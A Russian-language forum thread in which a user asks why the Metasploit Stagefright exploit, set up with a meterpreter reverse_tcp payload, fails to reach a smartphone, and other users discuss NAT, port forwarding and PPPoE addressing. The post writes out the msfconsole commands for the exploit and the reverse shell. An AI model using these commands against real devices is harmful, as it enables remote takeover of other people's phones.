• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

Проблема с портами

kalipsy

Active member
12.10.2019
26
0
BIT
11
Всем привет.
Хочу протестировать эксплоит stagefright_mp4_tx3g_64bit.
Открываю консоль:
Код:
msfconsole
use exploit/android/browser/stagefright_mp4_tx3g_64bit
set SRVHOST 192.168.0.19
set set PLAYLOAD linux/armle/meterpreter/reverse_tcp
set LHOST указываю VPN_IP
set LPORT 8080
set VERBOSE true
exploit
запускается сервер, копирую строку http://VPN_IP:8080/, тапаю по линку на смартфоне - ничего не происходит.
Таблица iptables пустая.
Подскажите пожалуйста, как правильно пробросить порты?
Если я не ошибаюсь, то у нас в РосТелеком NAT (при каждом рестарте роутера - новый ip).
Звонил в РосТелеком, там говорят что они порты вообще никак не блокируют.

kalipsy

Active member
12.10.2019
26
0
BIT
11
У тебя роутер верно? И если да, то есть ли у тебя в настройках "NAT"?
В настройка роутра NAT нет.

а потом это опечатка два раза SET????? и второй вопрос где происходит все в локале или глобалке??

Все происходит в глобале.

kalipsy

Active member
12.10.2019
26
0
BIT
11
А что же? интересно)
Подключение через PPPoe, дальше получаю серый ip и до тех пор пока не переподключусь через pppoe не получу другой, или ето белый ip (он всегда один и тот же), могу поднять на нем хост получить домен и попасть на вебморду своего роутера из глобала..... Кажется так....
И причем тут NAT?

а потом это опечатка два раза SET????? и второй вопрос где происходит все в локале или глобалке??
set set опечатка

Pulsera

Green Team
20.11.2016
181
28
BIT
10
Подключение через PPPoe, дальше получаю серый ip и до тех пор пока не переподключусь через pppoe не получу другой, или ето белый ip (он всегда один и тот же), могу поднять на нем хост получить домен и попасть на вебморду своего роутера из глобала..... Кажется так....
И причем тут NAT?

set set опечатка
Хм, интересно). Просто я через NAT пробрасываю порты и получаю доступ к чему либо в глобальной сети.

Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!